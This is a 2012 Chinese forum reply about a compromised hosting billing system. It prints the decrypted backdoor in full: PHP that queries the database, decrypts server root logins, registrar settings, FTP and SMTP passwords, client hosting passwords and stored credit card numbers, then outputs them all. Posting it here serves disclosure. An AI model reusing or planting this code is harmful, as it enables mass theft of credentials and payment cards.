|
|
发表于 2012-5-17 09:02:00
|
显示全部楼层
-_- 发表于 2012-5-17 10:06
请问怎么查看是否中招啊?后台没大黑阔的登陆记录。
不用登录,估计代码直接运行了,代码解密后是这样的[ol]include('configuration.php');$query = mysql_query("SELECT * FROM tblservers");$text = $text."\r\n######################### HOST ROOTS ###########################\r\n";while ($v = mysql_fetch_array($query)) { $ipaddress = $v['ipaddress']; $username = $v['username']; $type = $v['type']; $active = $v['active']; $hostname = $v['hostname']; $password = decrypt($v['password'], $cc_encryption_hash); $text = $text."Type $type\r\n"; $text = $text."Active $active\r\n"; $text = $text."Hostname $hostname\r\n"; $text = $text."Ip $ipaddress\r\n"; $text = $text."Username $username\r\n"; $text = $text."Password $password\r\n**************************************\r\n";}$text = $text."\r\n######################### HOST ROOTS ###########################\r\n";$text = $text."\r\n######################### Domain Reseller ###########################\r\n";$query = mysql_query("SELECT * FROM tblregistrars");while ($v = mysql_fetch_array($query)) { $registrar = $v['registrar']; $setting = $v['setting']; $value = decrypt($v['value'], $cc_encryption_hash); if ($value == "") { $value = 0; } $password = decrypt($v['password'], $cc_encryption_hash); $text = $text."$registrar $setting $value\r\n";}$text = $text."\r\n######################### Domain Reseller ###########################\r\n";$text = $text."\r\n######################### FTP +SMTP ###########################\r\n";$query = mysql_query("SELECT * FROM tblconfiguration where setting='FTPBackupHostname' or setting='FTPBackupUsername' or setting='FTPBackupPassword' or setting='FTPBackupDestination' or setting='SMTPHost' or setting='SMTPUsername' or setting='SMTPPassword' or setting='SMTPPort'");while ($v = mysql_fetch_array($query)) { $value = $v['value']; if ($value == "") { $value = 0; } $text = $text.$v['setting']." ".$value."\r\n";}$text = $text."\r\n######################### FTP +SMTP ###########################\r\n";$text = $text."\r\n######################### Client R00ts ###########################\r\n";$query = mysql_query("SELECT * FROM tblhosting where username = 'root' or username = 'Admin' or username = 'admin' or username = 'Administrator' or username = 'administrator' order by domainstatus");while ($v = mysql_fetch_array($query)) { $text = $text."\r\nDomain ".$v['domain']."\r\nIP ".$v['dedicatedip']."\r\nUsername ".$v['username']."\r\nPassword ".decrypt($v['password'], $cc_encryption_hash)."\r\nDomainstatus".$v['domainstatus']."\r\n";}$text = $text."\r\n######################### Client R00ts ###########################\r\n";$text = $text."\r\n######################### Client HOST ###########################\r\n";$query = mysql_query("SELECT * FROM tblhosting where domainstatus='Active'");while ($v = mysql_fetch_array($query)) { if (($v['username']) and($v['password'])) { $text = $text."\r\nDomain ".$v['domain']."\r\nIP ".$v['dedicatedip']."\r\nUsername ".$v['username']."\r\nPassword ".decrypt($v['password'], $cc_encryption_hash)."\r\nDomainstatus".$v['domainstatus']."\r\n"; }}$text = $text."\r\n######################### Client HOST ###########################\r\n";$text = $text."\r\n######################### Client CC ###########################\r\n";$query = mysql_query("SELECT * FROM `tblclients` WHERE cardtype '' order by issuenumber desc");while ($v = mysql_fetch_array($query)) { $cchash = md5($cc_encryption_hash.$v['0']); $s = mysql_query("select cardtype,AES_DECRYPT(cardnum,'{$cchash}') as cardnum,AES_DECRYPT(expdate,'{$cchash}') as expdate,AES_DECRYPT(issuenumber,'{$cchash}') as issuenumber,AES_DECRYPT(startdate,'{$cchash}') as startdate FROM `tblclients` where id='".$v['0']."'"); $v2 = mysql_fetch_array($s); $text = $text."\r\n".$v2[0]."|".$v2[1]."|".$v2[2]."|".$v2[3]."|".$v2[4];}$text = $text."\r\n######################### Client CC ###########################\r\n";echo($text);[/ol]复制代码 |
|
